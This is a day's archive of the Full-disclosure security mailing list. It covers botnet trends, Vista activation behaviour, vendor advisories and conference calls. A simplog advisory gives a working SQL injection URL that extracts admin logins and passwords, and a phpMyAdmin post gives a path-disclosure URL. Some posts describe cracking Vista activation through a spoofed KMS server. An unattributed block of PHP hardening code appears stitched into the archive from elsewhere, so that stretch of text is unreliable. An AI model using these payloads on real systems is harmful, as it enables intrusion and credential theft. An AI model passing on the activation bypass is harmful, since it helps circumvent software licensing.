References: <829b2de40701012337m3f7c440eic15c7a2ae3087056@mail.gmail.com>
Message-ID: <829b2de40701012338u3db6136cn6ca04eecc6e95af@mail.gmail.com>

---------- Forwarded message ----------
From: Jason Miller
Date: Jan 2, 2007 1:37 AM
Subject: Re: [Full-disclosure] Botnets: a retrospective to 2006, and where we are headed in 2007
To: Gadi Evron

Personally I don't think it's going to change at all, but with Vista coming out, as far as the PCs with XP Home/Pro go, if a serious exploit is found in those, guess what's gonna happen? Every single one is going to be exploited and botted/trojaned (same thing?). And if a serious vulnerability is found in Vista we're in even more trouble; with business versions of it out already, that could be a serious compromise to a corporate environment.

Other than that, I don't think much is really going to change unless something big happens, like every single DNS provider implementing DNS tracking and monitoring. Another idea: what about ISPs actually monitoring connection counts to their residential lines?
I don't think over 10k connections going TO, not from, a regular home connection in under a few hours is normal unless they're doing something like BitTorrent with DHT enabled; then I could see a lot of traffic, but still, ISPs really should start monitoring connections and such, because most of the compromised machines are connecting to a hacked ircd, and a lot of times these are on home connections with long lease times on IP addresses (50 day+). But these are just my thoughts. Comments?

On 12/22/06, Gadi Evron wrote:
> A few months back I released a post on where I think anti-botnets technology is heading (http://blogs.securiteam.com/index.php/archives/697). Now it's time for what happened in 2006, and what we can expect from here on.
>
> I am not a strong believer in such retrospective looks, as often they are completely biased and based on what we have seen and what we want to see. This is why I will try and limit myself to what we know happens and is likely to get attention, as well as what we have seen tried by bad guys, which is working for them enough to take to the next level.
>
> What changed with botnets in 2006:
> 1. Botnets reached a level where it is unclear today what parts of the Internet are not compromised to an extent. Count by clean rather than infected.
> 2. Botnets have become the most significant platform from which virtually any type of online attack and crime are launched. Botnets equal an online infrastructure for abusive or criminal activity online.
> 3. In the past year, botnets have become mainstream. From a non-existent field even in the professional realm up to a few years ago, where attacks were happening constantly regardless, it has turned into the main buzzword and occupation of the security industry today, directly and indirectly.
> 4. Websites have returned to being one of the most significant forms of infection for building botnets, which hadn't been the case since the late 90s.
> 5.
> Botnets have become the moving force behind organized crime online, with a low-risk high-profit calculation.
> 6. New technologies are finally being introduced, moving the botnet controllers from using just (or mainly) IRC to more advanced C&C (command and control) channels such as P2P, or multi-layered, such as DNS and IRC on the OSI model.
> 7. Botnets used to be a game of quantity. Today, when quantity is assured, quality is becoming a high concern for botnet controllers, both in type of bot as well as in abilities.
>
> What's going to happen with botnets in 2007:
>
> Botnets won't change. All will remain the same as it has been for years. Awareness, however, will increase, making the problem appear larger and larger, perhaps approaching its real scale. The bad guys would utilize their infrastructure to get more out of the bots (quality once quantity is here) and be able to do more than just steal cash, maximizing their revenue.
>
> Further, more and more attackers unrelated to the botnet controllers will make use of already compromised systems and existing botnets to gain access to networks, to facilitate anything from corporate espionage and intelligence gathering to shameless and open shows of strength to those who oppose them (think Blue Security), in the real world as well as the cyber one (which to the mob is one and the same; it's the income that speaks).
>
> Meaning, the existing botnet infrastructure will be utilized both in an open fashion, due to the fact online miscreants (real-world mob) face virtually no risk, as well as for quiet and secretive uses for third-party intelligence operations.
>
> Gadi Evron.
From drfrancky at securax.org Tue Jan 2 11:02:12 2007
From: drfrancky at securax.org (Javor Ninov)
Date: Tue, 02 Jan 2007 13:02:12 +0200
Subject: [Full-disclosure] simplog 0.9.3.2 SQL injection
In-Reply-To: <814b9d50701011906wbbda3aaw20b21de847813931@mail.gmail.com>
References: <45998BD5.2040303@securax.org> <814b9d50701011906wbbda3aaw20b21de847813931@mail.gmail.com>
Message-ID: <459A3BB4.501@securax.org>

str0ke, looks like I reinvented the wheel :-)). I didn't do any research; a friend of mine installed the latest version of this software and voila...

str0ke wrote:
> Javor,
>
> It seems rgod found this vulnerability back in April of 2006.
>
> http://www.milw0rm.com/exploits/1663
>
> <>
> ii)
> http://[target]/[path]/index.php?blogid=[sql]
> http://[target]/[path]/archive.php?blogid=[sql]
> http://[target]/[path]/archive.php?m=[sql]
> http://[target]/[path]/archive.php?y=[sql]
>
> /str0ke
>
> On 1/1/07, Javor Ninov wrote:
>> Affected Software:
>> simplog up to 0.9.3.2 (latest version - 12/05/2006)
>>
>> Site:
>> http://www.simplog.org
>> Simplog provides an easy way for users to add blogging capabilities to their existing websites. Simplog is written in PHP and compatible with multiple databases. Simplog also features an RSS/Atom aggregator/reader. Powerful, yet simple.
>>
>> Vulnerability:
>> SQL Injection in archive.php
>> other files probably also affected
>>
>> Example:
>> http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1
>>
>> Vendor status:
>> NOT NOTIFIED
>>
>> Javor Ninov aka DrFrancky
>> drfrancky shift+2 securax.org
>> http://securitydot.net/
From geoincidents at nls.net Tue Jan 2 11:10:43 2007
From: geoincidents at nls.net (Geo.)
Date: Tue, 2 Jan 2007 06:10:43 -0500
Subject: [Full-disclosure] Vista Reduced Function mode triggered
In-Reply-To: <002501c72e2b$65cdb540$650ba8c0@DORKA>
References: <002501c72e2b$65cdb540$650ba8c0@DORKA>
Message-ID:

> Yeah, probably - but just for the fun of it I'm curious what happened (unless it's some dumb user error).

Well, I've been running NT flavors of Windows since 1994, but I'm not beyond dumb user errors. So what sort of dumb user error (besides telling the machine NO you may not have full internet access) do you think would cause reduced functionality mode to kick in? And why would it kick back off with such stealth? I mean, shouldn't there be some sort of notification so admins don't spend lifetimes trying to track down why solitaire stops working?

I did disable a bunch of unneeded services like ssdp discovery, upnp, windows defender, the windows firewall, ICS and BITS and stopped and started others like media center launch and media center extender. But the disabled services are still disabled and there were plenty of reboots prior to reduced functionality mode kicking in.

If it takes more than simply roping the computer to a fraction of the internet then it could be any combination of things; I mean I played with it for over a week before it went into reduced functionality mode.

Geo.
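On the simplog archive.php injection reported earlier in this thread: the bug class is request parameters (blogid, pid) concatenated into SQL text. The following is an added example, not simplog's own code, showing that pattern beside a hardened handler that validates both ids as integers and binds them through PDO; the table and column names (blog_entries, title, body) are assumptions for illustration.

```php
<?php
// Added example, not simplog's own code. The archive.php handler pattern behind
// the blogid/pid injection in the thread, beside a hardened version. The table
// and column names (blog_entries, blogid, pid, title, body) are assumptions.
declare(strict_types=1);

// Vulnerable pattern: request parameters are spliced straight into the SQL
// text, so anything the client appends to "pid=" is parsed as part of the
// statement (the union select in the thread rides in exactly this way).
function buildArchiveQueryUnsafe(array $get): string
{
    $blogid = $get['blogid'] ?? '';
    $pid    = $get['pid'] ?? '';
    return "SELECT id, title, body FROM blog_entries WHERE blogid = $blogid AND pid = $pid";
}

// Hardened: the identifiers must be positive integers, checked before any
// query is built, and are bound as parameters rather than interpolated.
function archiveIds(array $get): array
{
    $opts   = ['options' => ['min_range' => 1]];
    $blogid = filter_var($get['blogid'] ?? null, FILTER_VALIDATE_INT, $opts);
    $pid    = filter_var($get['pid'] ?? null, FILTER_VALIDATE_INT, $opts);
    if ($blogid === false || $pid === false) {
        throw new InvalidArgumentException('blogid and pid must be positive integers');
    }
    return ['blogid' => $blogid, 'pid' => $pid];
}

function fetchArchiveEntries(PDO $db, array $get): array
{
    $ids  = archiveIds($get);
    $stmt = $db->prepare(
        'SELECT id, title, body FROM blog_entries WHERE blogid = :blogid AND pid = :pid'
    );
    $stmt->bindValue(':blogid', $ids['blogid'], PDO::PARAM_INT);
    $stmt->bindValue(':pid', $ids['pid'], PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Self-check against an in-memory SQLite database seeded with constructed rows.
function selfCheck(): bool
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE blog_entries (id INTEGER PRIMARY KEY, blogid INTEGER, pid INTEGER, title TEXT, body TEXT)');
    $db->exec("INSERT INTO blog_entries VALUES (1, 1, 1111, 'hello', 'first post')");
    $db->exec("INSERT INTO blog_entries VALUES (2, 2, 5, 'other', 'another blog')");

    // A well-formed request still returns its row.
    $rows = fetchArchiveEntries($db, ['blogid' => '1', 'pid' => '1111']);
    if (count($rows) !== 1 || $rows[0]['title'] !== 'hello') {
        return false;
    }

    // A pid carrying trailing SQL is spliced in verbatim by the unsafe builder...
    $tampered = ['blogid' => '1', 'pid' => '1111 OR 1=1'];
    if (strpos(buildArchiveQueryUnsafe($tampered), 'OR 1=1') === false) {
        return false;
    }
    // ...but the hardened path refuses it before any statement is prepared.
    try {
        fetchArchiveEntries($db, $tampered);
        return false;
    } catch (InvalidArgumentException $e) {
        return true;
    }
}

echo selfCheck() ? "ok\n" : "FAIL\n";
```

Running the file prints "ok" when the hardened handler accepts the well-formed request and rejects the tampered one; it needs the pdo_sqlite extension for the self-check only.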
From kevin.fielder at gmail.com Tue Jan 2 11:14:41 2007
From: kevin.fielder at gmail.com (kevin fielder)
Date: Tue, 2 Jan 2007 11:14:41 +0000
Subject: [Full-disclosure] Fwd: Vista Reduced Function mode triggered
In-Reply-To: <40359C8680F24C42A368DF473B5B36B90105174B@KINMLVEM07.e2k.ad.ge.com>
References: <829b2de40701012344r1a41e46dx3adcb507049ab79b@mail.gmail.com> <40359C8680F24C42A368DF473B5B36B90105174B@KINMLVEM07.e2k.ad.ge.com>
Message-ID: <37c3e82b0701020314n4c3d10vc728aca3f11c2640@mail.gmail.com>

I have no idea if the below is expected behavior or not, but for business / education etc. usage you can set up a server that deals with license management and activation - thus only that server, and not all internal machines, needs to be able to 'phone home'. The internal machines just need to be able to talk to the license management server (sorry, can't recall what M$ actually call this server).

This was I believe part of a recently published way to circumvent the licensing process where a VMWare image of a hacked licensing server was used.

cheers
K

________________________________
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Jason Miller
Sent: 02 January 2007 07:45
To: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Vista Reduced Function mode triggered

lol, I want to see this happen in a .edu unit where you can only access the internet by going through a limited HTTP proxy that does not allow the connect function; I think it would give humorous results. Unless it 'phones home' by visiting a page and printing said info, in which case it would probably be simple enough to modify the server it goes to and make it think it's going to Microsoft; in that event you could easily get cd keys if that's how it verifies it's a real Vista copy.

On 1/1/07, Geo. wrote:
>> It just can't be that simple. There has to be more to what happened to the guy.
>> Lots of computers are offline for several days at a time, it's inconceivable that they didn't test that.
>
> Ok, as complete as I can be in the few minutes I have to post this.
>
> During those three days I did a lot of poking around, stopping and starting services, switching from wired to wireless and back, trying to view high def video (which I still am not able to do in any video player except WMP for some reason) installing codecs and software, running into the event ID 4226 tcp security connect limit, etc.
>
> However I never got any notification of deactivation or any problem of that sort. Then on the third day suddenly solitaire would not start up and I couldn't get into network properties. I did a bunch of rebooting and troubleshooting trying to figure that out but got nowhere.
>
> So I went back to trying to get high def video to work in Media Player Classic and figured perhaps it was trying to download a codec so I removed the routes. It didn't help the video but I quickly found network properties started working. So then I tried solitaire and it worked. This was all directly after removing the routes, there wasn't but a few minutes between letting it talk to the net and these apps starting to work again.
>
> I decided this was probably reduced functionality in action but since I had never seen it before I needed some way to trigger it so I could compare since it would take 3 days to reproduce with route blocking. I disabled the software licensing service since it claims disabling that service will kick off reduced functionality mode. Nothing happened immediately but 24 hours later solitaire and network properties (and now control panel) would not start up. It was exactly the same apps and behavior. I enabled and started the software licensing service and in seconds things returned to fully functional just like removing the routes did.
>
> So it's possible the routes didn't trigger it, but removing them sure cured it quickly so that is my guess at this point. Further testing is needed. I won't be testing it for a couple days as I need the laptop connected to other networks to try some other software I need to test. (that tcp limit may prove a problem for network monitoring)
>
> Geo.

From Larry at larryseltzer.com Tue Jan 2 11:37:25 2007
From: Larry at larryseltzer.com (Larry Seltzer)
Date: Tue, 2 Jan 2007 06:37:25 -0500
Subject: [Full-disclosure] Fwd: Vista Reduced Function mode triggered
In-Reply-To: <37c3e82b0701020314n4c3d10vc728aca3f11c2640@mail.gmail.com>
Message-ID: <0273B67044957C41BD71D12EBA2E00AE08C5DD@becca.LarrySeltzer.local>

>> This was I believe part of a recently published way to circumvent the licensing process where a VMWare image of a hacked licensing server was used.
I'm sure it's irrelevant to the thread, but here's that story:
http://www.microsoft-watch.com/content/vista/another_vista_activation_crack_appears.html

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
larryseltzer at ziffdavis.com

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of kevin fielder
Sent: Tuesday, January 02, 2007 6:15 AM
To: jammer128 at gmail.com; full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] Fwd: Vista Reduced Function mode triggered

I have no idea if the below is expected behavior or not, but for business / education etc. usage you can set up a server that deals with license management and activation - thus only that server, and not all internal machines, needs to be able to 'phone home'. The internal machines just need to be able to talk to the license management server (sorry, can't recall what M$ actually call this server).

This was I believe part of a recently published way to circumvent the licensing process where a VMWare image of a hacked licensing server was used.

cheers
K

________________________________
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Jason Miller
Sent: 02 January 2007 07:45
To: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Vista Reduced Function mode triggered

lol, I want to see this happen in a .edu unit where you can only access the internet by going through a limited HTTP proxy that does not allow the connect function; I think it would give humorous results.
Unless it 'phones home' by visiting a page and printing said info, in which case it would probably be simple enough to modify the server it goes to and make it think it's going to Microsoft; in that event you could easily get cd keys if that's how it verifies it's a real Vista copy.

On 1/1/07, Geo. wrote:
>> It just can't be that simple. There has to be more to what happened to the guy. Lots of computers are offline for several days at a time, it's inconceivable that they didn't test that.
>
> Ok, as complete as I can be in the few minutes I have to post this.
>
> During those three days I did a lot of poking around, stopping and starting services, switching from wired to wireless and back, trying to view high def video (which I still am not able to do in any video player except WMP for some reason) installing codecs and software, running into the event ID 4226 tcp security connect limit, etc.
>
> However I never got any notification of deactivation or any problem of that sort. Then on the third day suddenly solitaire would not start up and I couldn't get into network properties. I did a bunch of rebooting and troubleshooting trying to figure that out but got nowhere.
>
> So I went back to trying to get high def video to work in Media Player Classic and figured perhaps it was trying to download a codec so I removed the routes. It didn't help the video but I quickly found network properties started working. So then I tried solitaire and it worked. This was all directly after removing the routes, there wasn't but a few minutes between letting it talk to the net and these apps starting to work again.
>
> I decided this was probably reduced functionality in action but since I had never seen it before I needed some way to trigger it so I could compare since it would take 3 days to reproduce with route blocking.
> I disabled the software licensing service since it claims disabling that service will kick off reduced functionality mode. Nothing happened immediately but 24 hours later solitaire and network properties (and now control panel) would not start up. It was exactly the same apps and behavior. I enabled and started the software licensing service and in seconds things returned to fully functional just like removing the routes did.
>
> So it's possible the routes didn't trigger it, but removing them sure cured it quickly so that is my guess at this point. Further testing is needed. I won't be testing it for a couple days as I need the laptop connected to other networks to try some other software I need to test. (that tcp limit may prove a problem for network monitoring)
>
> Geo.

From niceman at att.net Tue Jan 2 12:33:41 2007
From: niceman at att.net (Mike N)
Date: Tue, 2 Jan 2007 07:33:41 -0500
Subject: [Full-disclosure] Fwd: Vista Reduced Function mode triggered
References: <829b2de40701012344r1a41e46dx3adcb507049ab79b@mail.gmail.com> <40359C8680F24C42A368DF473B5B36B90105174B@KINMLVEM07.e2k.ad.ge.com> <37c3e82b0701020314n4c3d10vc728aca3f11c2640@mail.gmail.com>
Message-ID: <020901c72e6a$3c774910$1e70a8c0@othello>

> but for business / education etc usage you can set up a server that deals with license management and activation - thus only that and not all internal machines needs to be able to 'phone home'.
> The internal machines just need to be able to talk to the license management server (sorry can't recall what M$ actually call this server).

So the small 5-10 PC LAN with a secure setup/restrictive outgoing firewall now needs a license server to run Vista? (I know of several such setups.)

From xploitzz at gmail.com Tue Jan 2 11:54:13 2007
From: xploitzz at gmail.com (xploitzz)
Date: Tue, 2 Jan 2007 11:54:13 +0000
Subject: [Full-disclosure] Vista Reduced Function mode triggered&In-Reply-To=AA4FD01470854D4F91BD71B19138DD41@control3
Message-ID: <9e931d170701020354m25d1f878pacebd758f4e3de56@mail.gmail.com>

Vista apparently needs to call the mother ship quite frequently or it will go back into reduced operation mode. You can get around it by putting in a KMS server which calls home for you once every 6 months, or you can download an image of an already activated KMS VMware image, and with a few settings changes you only need to start it up once in a while to ensure your machines stay enabled.

http://www.mydigitallife.info/2006/12/14/kms-crack-method-to-activate-windows-vista-business-or-enterprise-edition-with-local-spoof-kms-server/

Joy....

From steven.mcgrath at chigeek.com Tue Jan 2 16:55:16 2007
From: steven.mcgrath at chigeek.com (Steven McGrath)
Date: Tue, 2 Jan 2007 10:55:16 -0600
Subject: [Full-disclosure] January 5th Chicago 2600 Meeting Information
Message-ID: <28326b7c0701020855j77854bafu6267c0a6a2af2ecc@mail.gmail.com>

The January Chicago 2600 Meeting is near! The meeting will be this Friday at the Neighborhood Boys and Girls Club and will feature much of the same usual fun that all of you have grown to expect!

[Presentation Information]
- 9:00pm - Web Apps.
  for public terminal use (Maniac)
- 10:00pm - ATM Hacking [Unconfirmed]
- After hours - Wii

[General Information]
- Meeting Time: 7:00pm - Approx. 3-5am
- Meeting Date: Friday, Jan. 5th
- Place: 2501 W Irving Park Road, Chicago
- More Info: http://chicago2600.net

From moskito at 012.net.il Tue Jan 2 17:23:45 2007
From: moskito at 012.net.il (Tal Argoni)
Date: Tue, 02 Jan 2007 19:23:45 +0200
Subject: [Full-disclosure] Information Disclosure Vulnerabilities in "phpMyAdmin"
Message-ID: <000001c72e92$c21d46f0$6602a8c0@new>

Thanks in advance,
Tal Argoni, CEH
www.zion-security.com

== Security Advisory ==

Issue: Remote Information Disclosure Vulnerabilities in "phpMyAdmin".
Discovered Date: 02/01/2007
Author: Tal Argoni. [talargoni at gmail.com]
Product Vendor: http://www.phpmyadmin.net/

Details:
phpMyAdmin is prone to an information disclosure. The vulnerability exists in the "darkblue_orange" visual theme, caused by a poor configuration. By requesting the file
http://www.example.com/phpMyAdmin/themes/darkblue_orange/layout.inc.php
PHP returns a fatal error that discloses the full path of the file on the server.

Exploitation URL:
http://www.example.com/phpMyAdmin/themes/darkblue_orange/layout.inc.php

Vulnerable: phpMyAdmin v2.9.1.1

Solution: go to line 33 and comment the line.
//$GLOBALS['cfg']['MainBackground']....;

Proof Of Concept:
http://www.example.com/phpMyAdmin/themes/darkblue_orange/layout.inc.php

From security at mandriva.com Tue Jan 2 17:55:01 2007
From: security at mandriva.com (security at mandriva.com)
Date: Tue, 02 Jan 2007 10:55:01 -0700
Subject: [Full-disclosure] [ MDKSA-2007:001 ] - Update libmodplug packages fix buffer overflow vulnerabilities
Message-ID:

_______________________________________________________________________
Mandriva Linux Security Advisory MDKSA-2007:001
http://www.mandriva.com/security/
_______________________________________________________________________

Package : libmodplug
Date : January 2, 2007
Affected: 2007.0
_______________________________________________________________________

Problem Description:

Multiple buffer overflows in MODPlug Tracker (OpenMPT) 1.17.02.43 and earlier and libmodplug 0.8 and earlier allow user-assisted remote attackers to execute arbitrary code via (1) long strings in ITP files used by the CSoundFile::ReadITProject function in soundlib/Load_it.cpp and (2) crafted modules used by the CSoundFile::ReadSample function in soundlib/Sndfile.cpp, as demonstrated by crafted AMF files.

Updated packages are patched to address this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4192
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security.
You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team

From sftsi at hushmail.com Tue Jan 2 18:51:25 2007
From: sftsi at hushmail.com (sftsi at hushmail.com)
Date: Tue, 02 Jan 2007 19:51:25 +0100
Subject: [Full-disclosure] It's all in the details, sapheal
Message-ID: <20070102185125.CA135DA84A@mailserver8.hushmail.com>

Dear sapheal at hack.pl,

could you please supply a lot more details in the advisories that you post? They usually just say buffer overflow in DumbServer in crappyfunction(), and in case it's true and they are exploitable, it's very nice of you to discover them and tell everyone about them, but we want to see a lot more detail. What parts of the program call the vulnerable function, under what circumstances, under what configuration and compilation options, is the involved data considered trusted or untrusted, and finally, do you have any proof that the overflows are exploitable or are they just crashes that you believe to be exploitable?

This goes for other people as well, not just sapheal.

Regards and best wishes for the new year,
SFTSI Evil Haxxx0rzzz
From vvandal at well.com Tue Jan 2 18:52:29 2007
From: vvandal at well.com (Vic Vandal)
Date: Tue, 2 Jan 2007 10:52:29 -0800 (PST)
Subject: [Full-disclosure] CarolinaCon 2007 - Call for Speakers/Papers
Message-ID:

InfoSec professionals, h4x0rs, script kidz, posers, and government spies:

"CarolinaCon" is back again! Yes, for about the price of your average movie admission with popcorn and a drink, YOU are invited to join us for yet another intimate and informative weekend of technology education.

What is this "CarolinaCon"?

CarolinaCon is an annual Technology Conference whose mission/purpose is to:
- enhance local and global awareness of current technology issues and developments,
- provide affordable technology education sessions to the unwashed masses,
- deliver varied/informative/interesting presentations on a wide variety of InfoSec/hacking/technology/science topics, and
- mix in enough entertainment and side contests/challenges to make for a truly fun event.

When/Where is CarolinaCon?

This year's event will be held on the weekend of April 20th-22nd, 2007. The event will mostly occur at the Holiday Inn in Chapel Hill, NC. Chapel Hill is about 30 minutes from Raleigh, Durham, and Research Triangle Park.

Who develops/delivers CarolinaCon?

CarolinaCon is proudly brought to you by "The CarolinaCon Group". The CarolinaCon Group is a non-profit organization registered in the state of NC, dedicated to educating the local and global communities about technology, information/network/computer security, and information rights. The CarolinaCon Group is also closely associated with various "2600" chapters across NC, SC, TN, VA, LA, DC, and NY. Many of the volunteers who help develop and deliver CarolinaCon come from those chapters.

What events will be at CarolinaCon?
CarolinaCon is mainly about the talks (presentations/demos). Alongside of those we'll surely have several other technology-related contests/challenges, as we've had in past years. Details on those will be announced soon. Who will be presenting which topics this year? That's where YOU possibly come in. If you are somewhat knowledgeable in some interesting field of technology, hacking, science, etc., and are interested in speaking/presenting at CarolinaCon, we invite you to submit your proposal (in brief) for our review. If you're interested in presenting please send; - your name or handle, - the topic/presentation name, - estimated time-length of presentation, and - a brief topic abstract ....via e-mail to: speakers carolinacon.org *NOTE: All submissions are due by mid-February 2007! Unfortunately as a non-profit dedicated to affordable education, we've made "less than $100 total profit" each of the past years and can't afford to pay anyone to speak nor cover any related expenses (sorry). However if you do speak at the Con, you will receive; - free Con admission, - a free Con t-shirt, - an invitation to a private soiree during the conference, - minimal fame and glory, and - mad props from myself and others. We value diversity, so please don't hesitate to propose your ideas no matter how outlandish. Past speakers/topics include highlights such as; - IPv6 Implementations/Demos - Tokachu (NC-2600) - Digital Media (why blue is not blue) - Lexicon (DC-2600) - Pirate Radio - Dr Anonymous (parts/places unknown) - Ethics in Hacking - Endgame (NC-2600) - Hack-Nano Project - cipz (LV-2600) - Chronology of the Phrack Microcosm - CyberSpy (SpyTech Industries) - DNS Hacks: No Resolution - Matt (NC-2600) - Gender in Hacking - Dr/Professor Holt (UNC-C) - Reverse Engineering - txs (GhettoHackers) - College of Hacking - Vic Vandal (NOLAB/504) - Building Competitive Robots - Nick Fury (NC-2600) ....and many more! 
All the talks were great in my humble opinion, but my "personal" favorites from past years have to be; pirate radio, nano-hacking, and the robot. The nano-hack maniac did live demonstrations that probably sterilized a few people near the stage, the robot presentation included a working "Johnny-5" type robot that the NCSSM team had built and competed with, and the pirate radio presentation was about "real" pirates who raided ships by force and then broadcast their programs from waters not in/near the continental United States (presented by one of those pirates with related photos). I'm excited! What do I do know? If you're interested in speaking, send the 411 requested to: speakers carolinacon.org (by February 15th 2007) And if you're interested in attending, watch this space for more details: www.carolinacon.org ...and don't forget to mark the date on your calendar (4-20, cough)! Peace, Vic From announce-noreply at rpath.com Tue Jan 2 18:33:54 2007 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Tue, 02 Jan 2007 13:33:54 -0500 Subject: [Full-disclosure] rPSA-2006-0234-2 firefox thunderbird Message-ID: <459aa592.z1LXQkLgrmh2LVGd%announce-noreply@rpath.com> rPath Security Advisory: 2006-0234-2 Published: 2006-12-22 Updated: 2007-01-02 Added thunderbird to advisory Products: rPath Linux 1 Rating: Severe Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: firefox=/conary.rpath.com at rpl:devel//1/1.5.0.9-0.1-1 thunderbird=/conary.rpath.com at rpl:devel//1/1.5.0.9-0.1-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6497 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6498 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6501 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6502 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6503 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6504 
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6505 https://issues.rpath.com/browse/RPL-883 Description: Previous versions of the firefox package are vulnerable to multiple types of attacks, including one that enables an attacker to run arbitrary attacker-provided executable code if JavaScript is enabled. 29 December 2006 Update: The thunderbird package has also been updated to address the same vulnerabilities. From rajesh.sethumadhavan at yahoo.com Tue Jan 2 17:42:06 2007 From: rajesh.sethumadhavan at yahoo.com (Rajesh Sethumadhavan) Date: Tue, 2 Jan 2007 23:12:06 +0530 Subject: [Full-disclosure] =?windows-1252?q?Google=92s_blacklisted_url_dat?= =?windows-1252?q?abase_=28phishing_url_database=29?= Message-ID: It is possible to access google`s blacklisted url database ( phishing url database ) http://sb.google.com/safebrowsing/update?version=goog-black-url:1:1 http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7998 http://sb.google.com/safebrowsing/update?version=goog-white-domain:1:19,goog-white-url:1:371,goog-black-url:1:7693,goog-black-enchash:1:15282 This database (Part of Google Safe Browsing) can be used in any anti-phishing commercial softwares :) Regards Rajesh Sethumadhavan http://www.xdisclose.com -------------- next part -------------- An HTML attachment was scrubbed... 
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070102/0d3a8573/attachment.html From security at mandriva.com Tue Jan 2 20:05:02 2007 From: security at mandriva.com (security at mandriva.com) Date: Tue, 02 Jan 2007 13:05:02 -0700 Subject: [Full-disclosure] [ MDKSA-2007:002 ] - Updated kernel packages fix multiple vulnerabilities and bugs Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2007:002 http://www.mandriva.com/security/ _______________________________________________________________________ Package : kernel Date : January 2, 2007 Affected: 2007.0 _______________________________________________________________________ Problem Description: Some vulnerabilities were discovered and corrected in the Linux 2.6 kernel: The Linux kernel does not properly save or restore EFLAGS during a context switch, or reset the flags when creating new threads, which could allow a local user to cause a Denial of Service (process crash) (CVE-2006-5173). The seqfile handling in the 2.6 kernel up to 2.6.18 allows local users to cause a DoS (hang or oops) via unspecified manipulations that trigger an infinite loop while searching for flowlabels (CVE-2006-5619). An integer overflow in the 2.6 kernel prior to 2.6.18.4 could allow a local user to execute arbitrary code via a large maxnum value in an ioctl request (CVE-2006-5751). A race condition in the ISO9660 filesystem handling could allow a local user to cause a DoS (infinite loop) by mounting a crafted ISO9660 filesystem containing malformed data structures (CVE-2006-5757). A vulnerability in the bluetooth support could allow for overwriting internal CMTP and CAPI data structures via malformed packets (CVE-2006-6106). The provided packages are patched to fix these vulnerabilities. All users are encouraged to upgrade to these updated kernels immediately and reboot to effect the fixes. 
In addition to these security fixes, other fixes have been included such as: - added the marvell IDE driver - use a specific driver Jmicron chipsets rather than using a generic one - updated the sky2 driver to fix some network hang issues To update your kernel, please follow the directions located at: http://www.mandriva.com/en/security/kernelupdate _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5173 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5619 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5751 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5757 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6106 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: 7eba457234782c9f83c47cd26be3de80 2007.0/i586/kernel-2.6.17.8mdv-1-1mdv2007.0.i586.rpm 80f104e8ff3081e7e868e3482f50fd81 2007.0/i586/kernel-enterprise-2.6.17.8mdv-1-1mdv2007.0.i586.rpm 72964c8645531460b742f9e54d118488 2007.0/i586/kernel-legacy-2.6.17.8mdv-1-1mdv2007.0.i586.rpm bc52255a4290284600dfc0e97e5797cd 2007.0/i586/kernel-source-2.6.17.8mdv-1-1mdv2007.0.i586.rpm fbfc24233bf616eab08b247194210fe7 2007.0/i586/kernel-source-stripped-2.6.17.8mdv-1-1mdv2007.0.i586.rpm e30ec4041c80756ab8e004b6335337cd 2007.0/i586/kernel-xen0-2.6.17.8mdv-1-1mdv2007.0.i586.rpm 4da4e24805a2a2301bf7f97f6e0fb974 2007.0/i586/kernel-xenU-2.6.17.8mdv-1-1mdv2007.0.i586.rpm 0cb62354da7ae0bd1dd6b851bedd9496 2007.0/SRPMS/kernel-2.6.17.8mdv-1-1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: c2aca75ee9ca338eb178e51fec0867fc 2007.0/x86_64/evince-0.6.0-1.1mdv2007.0.x86_64.rpm d4c8250e75b57b227b308e2a975ae13c 